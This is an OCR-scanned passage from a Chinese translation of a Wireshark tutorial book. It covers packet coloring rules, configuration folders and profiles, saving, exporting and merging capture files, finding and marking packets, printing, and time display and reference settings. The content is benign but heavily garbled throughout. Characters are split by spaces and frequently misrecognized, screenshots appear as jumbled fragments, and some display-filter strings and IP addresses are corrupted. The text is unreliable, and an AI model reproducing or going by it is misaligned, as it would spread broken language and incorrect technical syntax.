31 3.180870 L726 L16128 i 2 TCP 66 2918-~80 seq=0 Win=8192 Len=0 MsSs=1460 WS=4 SACK_PERM=1 
32 3.241650 T5160.2260-25 a 让 拓 1，， TCP 66 80-2918 [s K] =0 Ack=l Win=5840 n=0 MSS=1406 SACK_PE 
33 3.241744 了 DC a TCP 54 2918-+80 [ACK] Seq=1 Ack=1 Win= Len= 

34 3.241956 了 22 209.85.225.148 54 2867-=+80 [R 上 ACk=1 Win=0 Len= 





q 





584 
0 
2 1 Win=0 Len=0 
.242129 0 
4 0 
0 


AC Se 
AC seq=1 Ack=1 Win=0 Len 
Fa Se 


39 3.242311 





图 3-7 Wireshark 的 彩色 高 党 有 助 于 快速 标识 协议 


每 一 个 数据 包 的 凑 色 都 是 有 讲究 的 ， 这 些 闫 色 对 应 看 数据 包 使 用 的 
协议 。 举 例 来 说 ， 所 有 的 DNS 流量 都 是 监 色 的 ， 而 HITP 诉 量 都 是 绿色 
的 。 将 数据 包 进 行 彩 色 高 壳 ， 可 以 让 你 迅速 将 不 同 协议 的 数据 包 分 开 ， 
而 不 需要 查看 每 个 数据 包 的 Packet List 面 板 中 的 协议 列 。 你 会 发 现 这 样 
做 在 浏览 较 大 的 捕获 文件 时 ， 可 以 极 大 地 节省 时 间 。 

如 图 3-8 所 示 ，Wireshark 通 过 Coloring Rules 〈 着 色 规 则 ) 窗口 可 以 
轻松 地 得 看 每 个 协议 所 对 应 的 颜色 。 如 果 想 要 打开 这 个 窗口 ， 那 么 可 以 
在 主 下 拉 某 单 中 选择 View 并 单 击 Coloring Rules。 


你 可 以 创建 你 目 己 的 看 色 规 则 ， 或 者 修改 已 有 设置。 举例 来 说 ， 使 
用 下 列 步骤 可 以 将 HTTP 流 量 绿色 的 默认 背景 改 成 淡 紫 色 。 


(1) 打开 Wireshark， 并 且 打 开 Coloring Rules 窗 口 〈View- 
>Coloring Rules) 。 


(2) 在 看 色 规 则 的 列表 中 找到 HTTP 看 色 规则 并 单 击 选中 。 


(3) 单 击 Edit 按 钮 ， 你 会 看 到 一 个 Edit Color Filter 窗 口 ， 如 图 3-9 所 
人 小 O 





帮 Wireshark . Coloring Rules . Default ? X 





HSRP State Chang 
Spanning Tre 
OSPF State C 


e 
e Topology Change stp.type == 0x80 
hange 





sMD smb || nbss || nbns || nbipx || ipxsop || netbios 

HTTP http || tcp.port == 80 || http2 

IPX ipx || spx 

Routing hsrp || eigrp || ospf || bgp || cdp || vrrp || carp || gvrp || igmp || ismp 
TCP tcp 

UDP udp 

< 











Double chick to ect, Drag to move, Rules are processed in order until a match is found, 
+| 国 车 








图 3-8 ”你 可 以 在 Coloring Rules 窗 口中 和 奏 看 并 更 改 数据 包 的 看 色 





帮 Wireshark . Coloring Rules . Default 





set eq 
sctp,chunk_type eq ABORT 
(lip.dst == 224,0,0,0/4 && ip,ttl < 5 && pim BR lospf) || (ip.dst == 224.0.0.0/24 && ip,dst != 224.0.0.2 





SEE nb || nbss || nbns || nbipx || ipxsap || netbivs 
HITP http || tcp.port == 80|| http2 
和 ipx || spx_ 


hsrp || eigrp || ospf || bgp || cdp || vrrp || carp || gvrp || igmp ll ismp 





TCP tcp 
UDP udp 
< 











Double chick to edit, Drag to move. Ruies are processed in order until a match is found, 
十 | | 一 | | 中 E 











图 3-9 ”在 编辑 着 色 过 滤 右 时 ， 前 景色 和 背景 色 都 可 以 进行 更 改 


(4) 单 击 Background Color 按 钮 。 
(5) 使 用 闫 色 深 轮 选 择 一 个 你 布 望 使 用 的 其 色 ， 人 然后 单 击 OK。 


(6) 再 次 里 击 OK 来 应 用 改变 ， 并 回 到 主 和 窗口 。 主 窗口 此 时 应 该 已 
经 重 载 ， 并 使 用 了 更 改过 的 颜色 样式 。 


当 在 网 络 上 使 用 Wireshark 时 ， 可 能 会 友 现 你 处 理 祭 个 协议 的 工作 要 
比 其 他 协议 多 得 多 。 这 时 彩色 高 完 的 数据 包 能 让 你 的 工作 更 加 方便 。 举 
例 来 说 ， 如 下 你 完 得 你 的 网 络 上 有 一 个 恶意 的 DHCP 服 务 右 在 分 友 IP， 
那么 你 可 以 简单 地 修改 DHCP 协 议 的 春色 规则 ， 使 其 呈现 明黄 色 《 或 者 
其 他 易于 辨认 的 两 色 ) 。 这 可 以 使 你 更 快 地 找 出 所 有 DHCP 流 量 ， 并 让 
你 的 数据 包 分 析 工 作 更 上 其 效率 。 你 还 可 以 通过 基于 定制 的 过 滤 各 创建 看 
色 规 则 ， 来 扩展 这 些 看 色 规 则 的 使 用 。 


就 在 前 不 入， 我 在 给 本 地 一 群 学 后 展示 Wireshark 的 着 色 规 则 时 ， 有 一 名 学 后 是 色盲 ， 但 
他 通过 修改 着色 规则 分 辨 出 了 以 前 无 法 分 辨 出 的 协议 。 这 说 明了 修改 痢 色 规 则 的 功能 对 视觉 
残障 人 士 提供 了 一 定 程 度 上 的 可 用 性 。 





3.4.5 ”配置 文件 


当 我 们 想 直 接 修 改 设 置 时 ， 明 确 Wireshark 在 哪里 储存 配置 文件 是 
很 有 帮助 的 。 要 想 找 到 该 文件 ， 你 可 以 在 主 下 拉 采 早 中 早 击 Help 并 选择 
About Wireshark， 然 后 单 击 Folders 标 签 卡 。 该 窗口 如 图 3-10 所 示 。 


是 About Wireshark 


Wireshark Authors Felders Plugins Keyboard Shortcuts License 


Nanve Ty¥pical Files 

"File™ dialogs ‘Wsers\Chris Sanders\Downloads capture files 

Temp - mu 引 tLocal\Te untited cacture flles 

Personal configuration tC:\sers\Chris Sander... ing Wi OMters, references, Eers, ... 
Slubal Confiyuraliorl ;WProdrar Files Wir eshal RET Ss EN EET ET I Es, Me ... 
System : Program Files Wireshar Eihers, nets 

Program :Program Files\WWireshar program files 

Persona | Plugins :Wsers\Chris Sanders.. .ming Wiresharkiplugins dissector plJgins 

Global Plugins :Program Files\Wireshark\plugins2.,0, dissector plJgins 

Extcap pah :Program Files\Wireshark\extca Extcap Plucins search path 





图 3-10 ”定位 Wireshark 配 置 文件 的 位 置 


Wireshark 个 性 化 设置 最 重要 的 两 个 位 置 是 个 人 和 全 局 设置 日 录 。 全 
局 设置 目录 包含 看 所 有 默认 的 配置 选项 。 个 人 设置 目录 只 包含 了 针对 你 
账户 的 配置 选项 。 任 何 你 所 做 的 新 配置 都 将 会 使 用 你 提供 的 名 字 并 储存 
在 个 人 配置 文件 夹 的 子 目 杂 里 。 


全 局 和 个 人 配置 目录 的 区 别 是 重要 的 ， 因 为 任何 有 关 全 局 设置 的 改 
变 都 将 会 影响 到 每 一 个 在 该 系统 中 使 用 Wireshark 的 用 户 。 
3.4.6 ”配置 方案 


学 习 了 Wireshark 的 参数 配置 后 ， 有 些 时 候 会 发 现 你 在 使 用 一 种 配 
置 方案 但 很 局 又 要 切换 到 另 一 种 配置 方案 的 应 用 场景 。 其 实 我 们 没 必 要 
每 次 都 重新 手动 设置 这 些 选 项 ，Wireshark 引入 了 个 性 化 配置 方案 ， 让 
用 户 可 以 保存 一 组 配置 。 


一 个 配置 方案 储存 了 下 面 的 设置 。 


e Preferences 参数 选项 。 
。 Capture filters 捕获 过 滤 桥 。 


Display filters 显示 过 小 此 。 

Coloring rules 着 色 规 则 。 

Disabled protocols 己 禁 用 的 协议 。 

Forced decodes 强制 解码 。 

Recent settings 最 近 设 置 ， 比 如 窗 格 大 小 、 采 时 设置 和 列 宽 。 
Protocol-specific tables 针 对 特定 协议 的 表格 ， 例 如 SNMP 用 户 和 目 定 
义 HTTP 头 。 


要 但 看 配置 方案 列表 ， 可 以 在 主 下 拉 采 单 蛙 击 Edit， 并 选择 
Configuration Profiles 选项 。 另 一 种 办 法 是 在 屏 攻 的 右 下 角 单 击 右键 并 
选择 Manage Profiles 选 项 。 当 处 在 配置 方案 的 那个 窗口 时 ， 你 将 会 看 到 
Wireshark 的 预 设 配置 方案 ， 它 包 舍 了 如 疼 3-11 所 示 的 “ 缺 和 省 ”“ 监 
牙 ? 和 “经 典 ” 方 案 。 其 中 “Latency Investigation” 方 案 是 我 自 定 义 的 方案 ， 
它 和 被 显示 为 正体 ， 而 其 他 系统 全 局 或 默认 的 方 守 航 显示 为 和 料 体 。 


题 Wireshark . Configuration Profiles 


Defaoult 
Latency Investigation 





图 3-11 查看 配置 方案 


配置 方案 窗口 可 以 让 你 创建 、 复 制 、 删 除 和 应 用 配置 方案 。 创 建 一 
个 新 的 配置 方案 是 非 党 简单 的 。 


(1) 把 Wireshark 设 置 成 你 想 要 储存 的 配置 。 


(2) 在 主 下 拉 菜 单单 击 Edit， 并 选择 Configuration Profiles 选项 ， 
以 调 出 配置 方案 窗口 。 


(3) 单 击 加 号 〈+) 控 钮 并 且 给 该 方案 取 名 。 


(4) 单 击 OK。 


当 你 想 切 换 配 置 方案 时 ， 在 配置 方案 窗口 下 选择 方案 名 ， 然 后 单 击 
OK 即 可 。 有 一 种 更 快 的 方法 ， 融 是 在 屏 医 的 右 下 角 单 击 配置 文件 ， 然 
后 下 接 选 择 你 想 要 的 那个 方 条 ， 如 图 3-12 所 示 。 





88 d 21 99 4c 696 b 7d 4a 98 99 45 80 ] j[} 
80 b 64 40 99 8 ac 16 19 k.@ 

E32 2 90 56 f 80 980 00 96 $ 

20 99 d6 e5 80 99 92 84 1 93 93 

964 9 








图 3-12 ”快速 转换 配置 方案 


其 中 一 个 特别 有 用 的 特性 融 是 ， 每 个 配置 方 容 都 会 储存 在 单独 的 目 
录 中 ， 这 意味 看 你 可 以 方便 地 备份 和 共有 至 给 其 他 人 。 在 图 3-10 所 示 的 
folders 标签 卡 下 提供 了 全 局 和 个 人 配置 文件 的 路 人 笃 。 你 只 要 把 那个 配置 
ES 
算 机 了 。 


当 继 续 往 下 谈 这 本 书 的 时 候 ， 你 也 许 会 需要 去 创建 一 些 特别 的 配置 
方案 ， 来 解决 党 见 问 题 、 伍 找 网 络 延 人 运 的 源头 和 调 公 安 全 问题 。 询 被 频 
演 切 换 配 并 方 案 吓 看 。 恰 恰 相 反 ， 这 可 十 很 管 时 间 的 技巧 。 我 知道 很 多 
融 于 有 一 扒 不 同 的 配置 方案 用 来 应 对 个 同 的 场景 。 


现在 你 的 Wireshark 应 该 已 经 安装 好 并 运行 起 来 了 了， 你 已 经 准备 好 进 
es 
效 据 包 。 





[1] 肯塔基 州 古 关 国 的 一 个 内 陆 州 。 一 一 详 者 注 


第 4 和 章 ” 贰 苇 捕 获 数 据 包 





现在 你 已 经 了 解 了 Wireshark， 并 且 也 准备 好 进行 数据 包 的 捕获 和 分 
析 。 在 这 一 革 中 ， 你 将 会 和 学习 如 何 使 用 捕获 文件 、 分 析 数 据 包 以 及 时 间 
显示 格式 。 我 们 也 会 介绍 更 多 捕获 数据 包 所 用 到 的 高 级 选项 ， 并 进入 过 
滤 合 ， 盐 。 


4.1 ”使 用 捕获 文件 


当 进 行 数 据 包 分 析 的 时 候 ， 你 会 及 现 很 大 一 部 分 分 析 工 作 是 在 捕获 
数据 包 之 后 进行 的 。 退 第 情况 下， 你 会 在 不同 时间 进 行 多 次 捕获 ， 将 结 
朱 傈 存 下 来 ， 然 后 一 起 进行 分 机 ， 所 以 Wireshark 人 允许 你 你 存 捕获 文件 ， 
以 便 之 后 分 析 ， 你 也 可 以 将 多 个 捕获 文件 进行 合 3 


4.1.1 你 人 存 和 寻 出 捕获 文件 


如 果 想 要 保存 数据 包 的 捕获 ， 那 么 可 以 选择 File->Save As， 之 后 你 
应 该 能 看 见 Save File As 对 话 杠 ， 如 图 4-1 所 示 。 对 话 框 会 询问 你 想 要 保 
存 的 数据 包 捕 获 的 位 置 ， 以 及 你 希望 保存 的 格式 。 如 果 你 不 选择 一 个 文 
件 格 式 ， 那 么 Wireshark 会 默认 使 用 .pcapng 文 件 格式 。 


| Wireshark: Save file as 


wer [mp | 站 让 加 


Name Date modified Type 六 


aa 80211beacon Ba017 B33 AM Wiresh 
Quick access | 圈 80211-WEpauth 6/17/2017 8:33 AM 。 Wiresh 
a 80211-WEpauthfail B07 B33 AM Wiresh 
a B0211-WPAauth BOTT B33 AM Wiresh 
a 80211-WpAauthfail B70D17 B33 AM Wiresh 
a dctiveo sfingerprinting Ba B33 ANM Wiresh 
ml arp_gratuitous BD B33 BAM Wiresh 
Libraries me arp_resolution BOT7 B33 BM Wiresh 
到 5 arppoison B07 B33 AM Wiresh 
> 5 aurora Br Pa017 B33 中 MI Wiresh 

本 -从 PC ne dhcp_inlease_renewal B07 B33 AM Wiresh 。 


名 


Network 


二 笠 
Save as type: Wireshardc tcpdumpi... - pcap © .peap; .peap.g: 滞 Canceal 
Help 


L_ | Comprass with gzip 





图 4-1 Save File As 对 话 框 可 以 让 你 保存 你 的 数据 包 捕 获 


Save File As 对 话 框 的 一 个 更 强大 的 功能 是 你 可 以 指定 需要 你 存 的 数 
据 包 范围 ， 选 择 File->Export Specified Packets， 如 图 4-2 所 示 。 这 是 一 个 
让 “ 胖 ” 捕 获 文 件 变 “ 瘦 ” 的 好 方法 。 你 可 以 选择 只 保存 一 定 序 号 汇 围 内 的 
数据 包 、 标 记 了 的 数据 包 ， 或 者 经 过 过 滤 需 饶 选 后 显示 出 来 的 数据 包 等 
(标记 的 数据 包 和 过 滤器 会 在 这 一 章 后 面 进行 讨论 ) 。 


你 可 以 将 你 的 Wireshark 捕 获 数 据 导 出 到 几 种 不 同 格式 的 文件 中 ， 以 
便于 在 其 他 媒体 中 但 看 ， 或 是 导入 到 其 他 的 数据 包 分 析 工 具 中 。 这 些 格 
式 包 括 文 本 文件 、PostScript、 逗 写 分 隅 值 (CSV) 和 XML。 如 由 想 要 
导出 你 的 数据 包 捕 获 ， 那 么 可 以 选择 File->Export Packet Dissections， 并 
选择 你 想 要 导出 的 文件 格式 。 你 将 会 看 到 一 个 包含 者 相应 文件 格式 选项 
的 Save As 对 话 框 。 


| Wireshark: Export Specifled Packets 


Save in: ppadecaptures we 


区 


Duick access 


Desktop 


et 


Narne 

5 80211beacon 

于 80211-WEpauth 

3 80211-WEpauthfail 

5 80211-WpAauth 

5 B0211-WPAauthfail 

人 
sa actrreosfingerprinting 


上 二 
pa arp_gratuitous 


四 店 式 国 
Date modified 
Ba017 B33 AM 
Ba017 B33 站 MI 
Ba017 B33 AM 
Ba017 B33 AM 
Ba017 B33 AM 
Bean017 B33 AM 
Ba017 B33 AM 


Type 六 
Wiresh 
Wiresh 
Wiresh 
Wiresh 
Wiresh 
Wiresh 
Wiresh 
Wiresh 


BTADT7 B33 AM 
B20 B33 AM 
BOT B33 AM Wiresh 
BO B33 AM Wiresh 。 
二 字 


Wireshark tecpdumpi... -peap .peap: .peap.g: 径 Cancal 


Libraries ma arp_resolution 


Fi a ee 
a afppolson Wiresh 
ri 

0 DUTOTra 


This PC 七 dhcp_inlease_renewal 


File name: 
cave as type: 
ee 

[| Com 


Packet Range 


中 Captured 者) Displayed 

( 硬 ) MI packets 12 1z 
0 Selected packet 1 1 
Marked packets | 0 


First to last marked 有 


【Range: | | 0 


Remowe lgnored packets ] 0 





图 4-2 ”Export Specified Packets 对 话 框 让 你 针对 要 保存 的 流量 包 有 更 多 的 粒度 控制 
、 ~ _ 
4.1.2 合并 捕获 文件 


东 些 类 型 的 分 析 工 作 和 需要 合并 多 个 捕获 文件 ， 一 般 在 比较 两 个 数据 
沉 或 者 组 合 单独 捕获 的 沉 量 时 比较 利 见 。 


如 果 想 要 合并 捕获 文件 ， 那 么 应 完 打开 一 个 你 想 要 合并 的 文件 ， 
后 选择 File->Merge， 这 时 便 会 弹出 Merge with Capture File 的 对 话 框 ， 如 
图 4-3 所 示 。 选 择 一 个 你 希望 合并 到 当前 文件 的 狐 文 件 ， 然 后 选择 你 项 
望 进行 合并 的 方式 。 你 可 以 将 选中 的 文件 添加 到 当前 打开 的 文件 中 ， 也 
可 以 控 照 它们 时 间 礁 的 先后 进行 合并 。 


人 


4 


| Wireshark: Mlerge with capture file 


oak © 2 


| Name Date modified Type 


, 二 dns_axfr Ba017 B33ANM Wireshark capture.,,, 
i 四 dns_query_response BD B33 ANM Wireshark captuyre,,, 
四 dns_recurstvequery_client BOT B33 AM Wireshark captuyre,,, 
二 由 ns_recuUrsIwegqUery_serwer BOTT B33 AM Wireshark capture,,, 
| download-fast BD BIAANM Wireshark capture,,, 
| download-slow BAD B34AN Wireshark captyre,,, 
a facebook_ login BD B34ANM Wireshark captuyre,,, 
Libraries : 
二 http_espn BaD7 BIAANM Wireshark capture,,, 
a 辆 http_google BD B34AN Wireshark captuyre,,, 
Thisp CC 四 http_post BD B34ANM Wireshark captuyre,,, 
和 


: i File name: Facebook_message “et 


Files of type: Ml Files 





























Read fiter: | | Formmat: Wireshark tecpdumpi... - pcap 
Size: 2990 bytes 

0 Prepend packets to existing file Packets: 6 

() Merge packets chronologically First Packet: 2010-04-05 15:23:25 

mV Append packets to evisting file 日 apsed: 各 :加 :上 吕 





图 4-3 ”Merge with Capture File 对 话 框 可 以 让 你 合并 两 个 捕获 文件 


4.2 分 析 数 据 包 


你 最 终 将 会 过 到 处 理 大 量 数据 包 的 情形 。 当 这 些 数 据 包 的 数量 达到 
上 上 千 长 全 上 万 时 ， 你 需要 更 高 效 地 在 这 些 数据 包 中 进行 得 找 。 出 于 这 个 
目的 ，Wireshark 人 允许 你 对 符合 一 定 条 件 的 数据 包 进 行 标 记 ， 或 者 打印 数 
扬 包 以 供 参 考 。 


4.2.1 你 人 存 和 寻 出 捕获 文件 


如 果 想 要 找到 符合 特定 条 件 的 数据 包 ， 那 么 可 以 按 Ctrl-F 组 合 键 打 
开 Find Packet 条 形 框 ， 如 图 4-4 方 框 内 所 示 。 这 个 条 形 框 应 该 在 过 小 框 和 
包 列 表 窗 口 之 间 。 








Packet list 了 Narrow & Wide 了 Case Sensitiye | Display filter Find | |Cancel 
No， Time Source Destination Protocol Length Info 入 
Ph fh Te | Te 74.125.95 .104 TCP 66 1686 > 89 [SYN] Seq=2882691767 Win=8192 Len=8 MSS=1468 WS=4 SACK.. 
=! 172.16.16.128 TCP 66 89 > 1686 [SYN, ACK] Seq=2775577373 Ack=2882691768 Win=5728 Len=.… 
-er 74.125.95 .194 TCP 54 1686 > 808 [ACK] Seq=2882691768 Ack=2775577374 Win=16872 Len=9 


4 9..。 172.16.16.128 74.125.95 .1094 HTTP 681 GET / HTTP/1.1 





图 4-4 在 Wireshark 中 根据 条 件 否 找 数据 包 一 一 在 这 个 案例 中 ， 只 有 数据 包 符 合 表达 式 TCP 才 会 


被 显示 出 3 
这 个 对 话 框 为 查找 数据 包 提 供 了 3 个 选项 。 
。 Display filter 选 项 允许 你 通过 输入 表达 陈 进 行 肾 选 ， 并 只 找 出 那些 
满足 该 表达 式 的 数据 包 ， 就 像 在 图 4-4 中 所 使 用 的 那样 。 
。 Hex Value 选 项 使 用 你 所 输入 的 十 六 进 制 数 ， 对 数据 包 进 行 搜 索 。 
。 String 选 项 使 用 你 所 输入 的 字符 串 ， 对 数据 包 进 行 搜 索 。 你 可 以 在 
搜索 面板 上 设置 是 否 区 分 大 小 写 和 其 他 的 格式 。 
表 4-1 给 出 了 上 述 几 种 搜索 类 型 的 例子 。 


表 4-1 用 来 得 找 数据 包 的 搜索 类型 


ip.addr==192.168.0.1 


00:ff 


ff:ff 
00:AB:B1:f0 





在 确定 选项 并 在 文本 框 中 输入 搜索 关键 词 之 后 ， 单 击 Find， 殉 会 找 
和 到 满足 该 关键 词 的 第 一 个 数据 包 。 如 果 想 要 找到 下 一 个 匹配 的 数据 包 ， 
则 按 CtrlL-N 组 合 键 ; 想 要 找到 前 一 个 ， 则 按 Ctrl-B 组 合 键 。 


4.2.2 ”标记 数据 包 


在 找到 那些 符合 搜索 条 件 的 数据 包 之 后 ， 你 可 以 根据 需要 进行 标 
记 。 淮 例 来 说 ， 可 能 你 希望 将 那些 需要 分 开 你 和 存 的 数据 包 标 记 出 来 ， 或 
者 根据 颜色 快速 地 查找 它们 。 如 图 4-5 所 示 ， 被 标记 的 数据 包 会 以 黑 底 
日 字 旺 示 《 你 也 可 以 仅仅 将 标记 了 的 数据 包 选 择 出 来 ， 然 后 将 其 作为 数 
扼 包 捕获 保存 下 来 ) 。 


.i i 让 .上 = 各 LI Oi mB 
RT 有 I! TR ee 有 9 





图 4-5 ”被 标记 的 数据 包 将 在 你 的 屏幕 上 局 有 党 喧 示 。 在 这 个 例子 中 ， 
第 二 个 数据 包 补 标记 并 且 显 示 为 深 色 


如 果 你 想 要 标记 一 个 数据 包 ， 那 么 可 以 右 击 Packet List 面 板 ， 并 在 
弹出 的 玉昌 中 选择 Mark Packet， 或 者 在 Packet List 面 板 中 选中 一 个 数据 
包 ， 人 然后 按 Ctrl-M 组 合 键 ; 如果 想 取 消 对 一 个 数据 包 的 标记 ， 那 么 再 按 
一 次 Ctrl-M 组 合 键 ; 就 可 以 将 其 取消 。 在 一 次 捕获 中 ， 你 想 标 记 多 人 少 个 
数据 包 都 可 以 ; 如 果 你 想 要 在 标记 的 数据 包间 前 后 切换 ， 那 么 分 别 按 
Shift-Ctrl-N 和 Shift-Ctrl-B 组 合 键 即 可 。 


4.2.3 打印 数据 包 


虽然 大 多 数 分 析 都 会 在 电脑 屏 须 前 进行 ， 但 你 可 能 仍然 需要 将 捕获 
结 末 打印 出 来 。 我 经 第 将 数据 包 打 印 出 来 ， 并 贴 在 我 的 架子 上 ， 这 样 我 
在 做 其 他 分 析 的 时 候 ， 就 可 以 快速 地 参考 这 些 内 容 了。 特别 是 在 做 报告 
的 时 候 ， 将 数据 包 打 印 成 一 个 PDF 文 件 将 是 非 第 方便 的 。 


如 果 需 要 打印 捕获 的 数据 包 ， 那 么 可 以 在 主 菜 单 中 选择 File->Print 
打开 Print 对 话 杠 。 你 可 以 在 图 4-6 中 看 到 Print 对 话 框 的 样子 。 


0 All collapsed 

Bs displayed 

OY Al expanded 
L | Bytes 


[ | Print each packet on a new page 


+ Se - ENMTL WD resets 


0 captured Displayed 
All packets 1 
OO selected packets only 


12 


Marked packets only 


Og [ | 


Remove ignored packets 


page Setup.. 


2 

1 

0 

First to last marked 0 
0 

0 


1 
0 
D 
0 
0 





图 4-6 ”Print 对 话 框 可 以 让 你 打印 指定 的 数据 包 


在 这 个 例子 中 ， 与 Export Specified Packets 对 话 框 相似 ， 你 可 以 按 一 
定 范围 打印 数据 包 ， 比 如 被 标记 的 数据 包 ， 或 者 作为 过 滤 亏 烯 选 结 末 电 
示 出 来 的 数据 包 。 对 于 每 一 个 数据 包 ， 你 也 可 以 在 Wireshark 的 3 个 主 面 
板 中 选择 打印 对 象 。 在 你 做 好 了 这 些 选 择 之 后 ， 单 击 Print。 


4.3 ”议定 时 间 显 示 格 式 和 相对 参 邦 


时 间 在 数据 包 的 分 析 中 格外 重要 。 所 有 在 网 络 上 发 生 的 事情 都 是 与 
时 间 奶 恩 相 关 的 ， 并 且 你 几乎 需要 在 每 一 个 捕获 文件 中 检查 时 间 规 律 以 
及 了 网络 延迟 。Wireshark 意 识 到 时 间 的 重要 性 ， 并 提供 了 一 些 相 关 的 选项 
以 供 设 定 。 在 本 市 中 ， 我 们 将 介绍 时 间 的 显示 格式 和 相对 参考 。 


4.3.1 时间 显示 格式 


Wireshark 上 所 捕获 的 每 一 个 数据 包 都 会 由 操作 系统 给 予 一 个 时 间 惟 。 
Wireshark 可 以 显示 这 个 数据 极 捕 获 时 的 绝对 时 间 惟 ， 也 可 以 是 与 上 一 个 


航 捕获 的 数据 包 或 是 捕获 开始 及 结束 相关 的 相对 时 间 崔 。 


与 时 间 普 示 相 关 的 选项 可 以 在 主 采 里 的 View 采 早 中 找到 ， 如 图 4-7 
所 示 ， 可 以 让 你 设置 时 间 的 精度 。 






































帮 hittp google.pcap 一 口 XxX 
File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 
前 加 忌 忆 Main Toolbar 三 |Q@QQQ 了 对 
同 | Apply ad 开明 Filter Toolbar 世 3 |Eoression.. + TCPRST 
Packet list Wireless Toolbar itive String 可 Find | | Cancel 
No， 双 StatusBar Protocol Length Info 
p= 1 5.194 TCP 66 1666 > 88 [SYN] Seq=2882691767 Win=8192 Len=8 MSS=1468 WS=4 SACK.. 
2 Packet List 6.128 TCP 66 86 > 1686 [SYN, ACK] Seq=2775577373 Ack=2882691768 Win=5728 Len=.- 
3 WY Packe:Details 5.104 TCP 54 1666 > 86 [ACK] Seq=2882691768 Ack=2775577374 Win=16872 Len=9 
4 packe: Bytes 5.164 HTTP 681 GET / HTTP/1.1 
5 6.128 TCP 69 89 > 1686 [ACK] Seq=2775577374 Ack=2982692395 Win=6976 Len=9 
6 Time Display Format Date and Time of Day (1970-01-01 01:02:03.123456) Meta+Alt+1  d PDU 
7 : d PDU] 
Name Resolution » :02: 
a Year, Day of Year, and Time of Day (1970/001 01:02:03.123256) 95 Ack=2775580186 Win=16872 Len-0 
9 元 Time of Day (01:02:03.123456) Meta+Alt+2 dd PDU] 
19 Seconds Since 1970-01-01 Meta+Alt+3 dd PDU] 
11 Expand Subtrees Shift+ Right ® Seconds Since Beginning of Capture te A 95 Ack=2775581694 Win=16872 Len=9 
Er Ee a Seconds Since Previous Captured Packet Meta+Alt+5 
Collapse All Ctrl+Left - - : 
Eth Seconds Since Previous Displayed Packet Meta+Alt+6 
Interne 忆 BColorize Packet List UTC Date and Time of Day (1970-01-01 01:02:03.123456) Meta+Alt+7 
了 
ransm] Coloring Rules... UTC Year, Day of Year, and Time of Day (1970/001 01:02:03.123456) 
Colorize Conversation » UTC Time of Day (01:02:03.123456) Meta+Alt+8 
对 ”ResizeColumns Ctrl+Shift+R Automatic (from capturefile) 
Seconds 
Internals 
Tenths of d 
Show Packet in New Window Hundredths of a second 
加 Reload Ctrl+R Milliseconds 
Microsecon d 
Nancsecon d 
3909 68 21 6a 5b ?7d 4a 80 85 5d 21 99 4c 98 99 Display Seconds With Hours and Minutes 


3010 806 28 34 d8 986 99 33 86 ec 82 4a 7d 5f 68 -一 Cr 
320 19 88 99 58 86 46 a5 6f f3 le 7c¢c 23 5d 2b 58 19 sspPaF0 oal#1P. 
330 99 6d do 7e 9 88 82 84 9695 7e 91 91 四 we。 oo。。 





@ 于 | Packets: 12 * Displayed: 12 (100.0%) * Load time: ]:0.0 | Profile: Default 


图 4-7 多 种 可 用 的 时 间 显示 格式 


时 间 表 示 格 式 选 项 可 以 让 你 根据 时 间 显示 方式 调整 不 同 的 设置 。 这 
包含 了 日 期 和 时 间 、UTC 日 期 和 时 间 、 自 UNIX 纪 元 起 的 秒 数 、 自 第 一 
个 包 起 的 秒 数 〈 默 认 ) 、 自 上 一 个 包 起 的 秒 数 等 。 


格式 选项 允许 你 选择 不 同 的 格式 ， 而 精度 选项 允许 你 将 精度 设 定 为 
目 动 或 者 手动 ， 比 如 秒 、 坚 秒 、 微 秒 等。 在 本 书后 面 ， 我 们 将 调整 这 些 
设置 ， 所 以 你 现在 殉 需 要 丈 芒 它 。 


国 





从 多 个 设备 中 比较 包 数 据 ， 一 定 要 确认 这 些 设备 之 间 的 时 间 是 同步 的 ， 特 别 是 当 你 做 取 
证 分 机 和 检查 问题 时 。 你 可 以 使 用 网 络 时 间 协 议 〈《NTP) 来 确保 网 络 设备 的 时 间 是 同步 的 。 
当 包 数据 来 日 不 同时 区 的 设备 时 ， 请 考虑 使 用 统一 的 UTC 时 间 来 避免 干扰 。 





4.3.2 ”数据 包 的 相对 时 间 参 考 


数据 包 的 相对 时 间 参 考 ， 人 允许 你 以 一 个 数据 包 作 为 基准 ， 而 之 后 的 
数据 包 都 以 此 计算 相对 时 间 戳 。 当 你 检查 在 捕获 文件 之 外 的 东 个 点 触及 
的 一 系列 连续 事件 时 ， 这 个 功能 会 变 得 非常 好 用 。 


如 果 和 硕 望 将 某 一 个 数据 包 设 定 为 时 间 参 考 ， 那 么 可 以 在 Packet List 
面板 中 选择 作为 相对 参考 的 数据 包 ， 然 后 右键 选择 Set/Unset Time 
Reference。 如 末 硕 望 取 消 一 个 数据 包 的 相对 时 间 参 考 ， 则 重复 刚才 的 操 
0 选择 完 参考 数据 包 后 ， 你 也 可 以 按 下 组 合 键 Ctrl-T 达 到 一 样 的 
> 


在 你 将 一 个 数据 包 设 定 为 时 间 参 考 之 后 ，Packet List 面 板 中 这 个 数 
据 包 的 Time 列 就 会 显示 为 REF， 如 图 4-8 所 示 。 








图 4-8 ”开启 了 数据 包 相 对 时 间 参 考 的 一 个 数据 包 


只 有 妆 捕 获 的 时 间 喧 示 格 式 设 定 为 与 捕获 开始 相对 的 时 间 时 ， 设 定 
数据 包 时 间 参 考 才 有 用 处 。 使 用 其 他 设 定 都 不 会 生成 有 用 的 结 末 ， 并 且 
其 产生 的 一 扒 时 间 会 很 令 人 迷惑 。 


4.3.3 ”时间 偏 移 


有 些 时 候 你 也 许 会 过 到 来 日 不 同 源 的 包 数 据 ， 它 们 之 间 的 时 间 是 不 
同步 的 。 妆 我 们 调查 从 不 同 地 方 捕 获 的 相同 流量 时 ， 这 种 情况 尤为 多 
见 。 昌 然 大 多 数 的 管理 员 都 会 尽 可 能 地 保持 网 络 上 每 一 个 设备 的 时 间 都 
是 同步 的 ， 但 例外 情况 时 有 发 生 。Wireshark 提供 了 一 项 时 间 偏 移 的 功 
- 它 通 过 把 包 的 时 间 稚 整体 偏 移 调整 ， 来 减轻 在 分 析 中 可 能 过 到 的 奈 
人 , 


要 对 一 个 或 多 个 包 的 时 间 崔 进行 侦 移 调整 ， 只 需 选 择 Edit->Time 


Shift 或 者 按 下 组 合 键 Ctrl-Shift-T。 时 间 偏 移 窗口 打 开 后 ， 你 就 可 以 设 定 
一 个 时 间 区 间 ， 来 对 所 有 包 的 时 间 进 行 调 整 ， 或 者 针对 一 个 包 设 置 时 间 
